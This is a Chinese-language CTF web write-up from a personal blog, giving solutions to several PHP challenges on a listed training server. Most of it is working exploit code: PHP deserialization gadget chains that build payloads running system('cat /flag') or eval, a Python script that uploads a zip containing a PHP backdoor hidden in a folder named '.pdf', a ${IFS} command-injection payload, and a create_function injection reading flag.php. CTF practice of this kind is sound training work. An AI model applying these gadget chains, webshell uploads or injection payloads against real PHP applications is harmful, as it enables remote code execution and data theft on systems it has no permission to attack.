第一周训练web wp


http://47.101.176.40:11114/

<?php
$command="system";
$argv='cat ./flag.php';
class QMRb7
{
    public $a;
    public $b;
}
class KOkjs
{
    public $a;
    public $b;
}
class MGkk8
{
    public $a="RPG";
    public $b;
}
class y97pu
{
    public $a;
    public $b;
    public $c;
}
$a=new y97pu();
$a2=new KOkjs();
$a2->a=new MGkk8();
$a2->a->b=new QMRb7();
$a2->a->b->a=$command;
$a2->a->b->b=$argv;
$c=array($a,$a2);
$c[0]->a=&$c[0]->b;
$c[0]->c=&$c[1];
echo serialize($c).PHP_EOL;

![image-20220705233622872](/Users/kento/Library/Application Support/typora-user-images/image-20220705233622872.png)

http://47.101.176.40:9004/

绕过rmdir函数,这里is_dir函数是检查是否为文件夹,rmdir是删除空的文件夹。所以这里可以利用白名单绕过,构造一个文件夹名为.pdf的文件夹,里面包含一个php后门:

![image-20220705234017189](/Users/kento/Library/Application Support/typora-user-images/image-20220705234017189.png)

然后上传压缩包:

import requests
import base64
url='http://47.101.176.40:9004/'
str=open("shell.zip","rb").read()
str=base64.b64encode(str)
data={
    'base64':str,
}
r=requests.post(url,data=data)
print(r.content)

getshell:

1600EA7F3151DEC7469BD66DAE6105E1

http://47.101.176.40:12223/

<?php
namespace Control\State {
    class StopHook {
        protected $processes;
        public function __construct() {
            $this -> processes = array(new \Faker\MyGenerator());
        }
    }
    require 'closure/autoload.php';
    $payload = new StopHook();
    echo base64_encode(serialize($payload));
}

namespace Faker {
    class MyGenerator {
        protected $defaultValue;
        public function __construct() {
            $this -> defaultValue = new \Method\Func\GetFile();
        }
    }
}

namespace Method\Func{
    class GetFile {
        private $flag;
        public function __construct() {
            $this -> flag = new \Method\Func\GetDefault();
            $this -> value = 'test';
        }
    }
}

namespace Method\Func{
    class GetDefault {
        private $source;
        public function __construct()  {
            $this -> source = new \Method\Func\GenerateFile();
            $this -> source -> flag = 'myTest';
        }
    }
}

namespace Method\Func{
    class GenerateFile {
        public $flag;
        protected $buffer;

        public function __construct() {
            $function = function(){ eval(system('cat /flag')); };
            $this -> source -> generate = new \Opis\Closure\SerializableClosure($function);
        }
    }
}

![image-20220706094759496](/Users/kento/Library/Application Support/typora-user-images/image-20220706094759496.png)

http://47.101.176.40:11112/

<?php
class A{
    public $c;
    public function __construct()
    {
        $this->c=new B();
    }
}
class B{
    public $b;
    public function __construct()
    {
        $this->b=new C();
    }
}
class C{
    public function getflag(){
        echo readfile("/flag");
    }
}
$a=new A();
echo urlencode(serialize($a));

![image-20220706095906052](/Users/kento/Library/Application Support/typora-user-images/image-20220706095906052.png)

http://47.101.176.40:13334/

<?php

class a {
    public function __construct($a)
    {
        $this->test = $a;
    }
}

abstract class b {
    private $b = 1;

    public function __construct($a)
    {
        $this->b = $a;
    }
}

class c extends b {
    private $call;
    protected $value;

    public function __construct($a,$b)
    {
        $this->call = $a;
        $this->value = $b;
    }

    public function setB($c)
    {
        parent::__construct($c);
    }
}

class d {
    public $value;

    public function __construct($a) {
        $this->value = $a;
    }
}

$c = new C(
    [new d("system"),"eval"],
    [new d("cat /flag"),"eval"]
);

$c->setB([$c,"eval"]);
$exp = new a($c);

echo base64_encode(serialize($exp));

![image-20220706103326903](/Users/kento/Library/Application Support/typora-user-images/image-20220706103326903.png)

http://47.101.176.40:10011/

首先使用mv移动fla.php的内容到可读文件中:

c=mv${IFS}fl?.php${IFS}qwqw

然后访问qwqw:

![image-20220706105945909](/Users/kento/Library/Application Support/typora-user-images/image-20220706105945909.png)

http://47.101.176.40:8778/

<?php
class A {
    public $var;
}
class B{
    public $func;
    public $arg;
}
$a=new A;
$a->var=new B;
$a->var->func="create_function";
$a->var->arg='return(1);}require(~('.strval(~('php://filter/read=convert.base64-encode/resource=flag.php')).'));//';
echo urlencode(serialize($a));
?>

![image-20220706110621315](/Users/kento/Library/Application Support/typora-user-images/image-20220706110621315.png)

http://47.101.176.40:3333/index.php

https://www.leavesongs.com/PENETRATION/how-I-hack-bash-through-environment-injection.html

tnt师傅提示是2022虎符的easyphp


文章作者: kento
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 kento !
评论
  目录